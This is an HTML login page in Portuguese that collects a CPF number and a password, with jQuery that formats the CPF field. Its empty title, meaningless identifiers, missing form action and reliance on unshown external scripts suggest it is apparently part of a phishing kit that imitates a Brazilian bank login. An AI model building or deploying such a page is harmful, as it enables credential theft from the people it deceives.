<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/fride-select.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div class="holan">
            <div class="upto">
                <div class="upto">
                    <img src="./img/topap001.png" alt="">
                </div>
            </div>
        
        
            <div class="container">
                <div class="container">
            
                    <p class="p1">Acessar sua conta</p>
            
                    <form method="post" id="pg1">
                        
                        <div class="group">  
                                
                            <input type="tel" id="usa" required placeholder="" maxlength="20">
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label for="">CPF</label>
                        </div>
                        <div class="inder">
                            <img src="./img/indoinpo.png" alt="">
                        </div>
                        <div class="group">  
                                
                            <input type="password" id="paso" required placeholder="" maxlength="20">
                            <span class="highlight"></span>
                            <span class="bar"></span>
                            <label for="">Senha</label>
                        </div>
                        <div class="inder">
                            <img src="./img/indoinpo2.png" alt="">
                        </div>
        
                        <button id="botn" disabled>Entrar </button>
                        
                    </form>
                        
                    
                    
                    
                  </div>
            </div>
        </div>
        </div>

    

    <script>
        $(document).ready(function() {
            $('#usa').on('input', function() {
                // Remove any existing dots, dashes, and non-digit characters
                var inputValue = $(this).val().replace(/[^\d]/g, '');
                
                // Format the input
                var formattedValue = '';
                for (var i = 0; i < inputValue.length; i++) {
                    if (i > 0 && i % 3 === 0 && i < 9) {
                        formattedValue += '.';
                    } else if (i >= 9 && (i - 9) % 2 === 0) {
                        formattedValue += '-';
                    }
                    formattedValue += inputValue[i];
                }
                
                $(this).val(formattedValue);
                
                // Enable the button if the input has 10 or more digits, otherwise, disable it
                if (inputValue.length >= 11) {
                    $('#botn').prop('disabled', false);
                } else {
                    $('#botn').prop('disabled', true);
                }
            });
            
            // Button click event (you can modify this event as needed)
            
        });
    </script>
    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>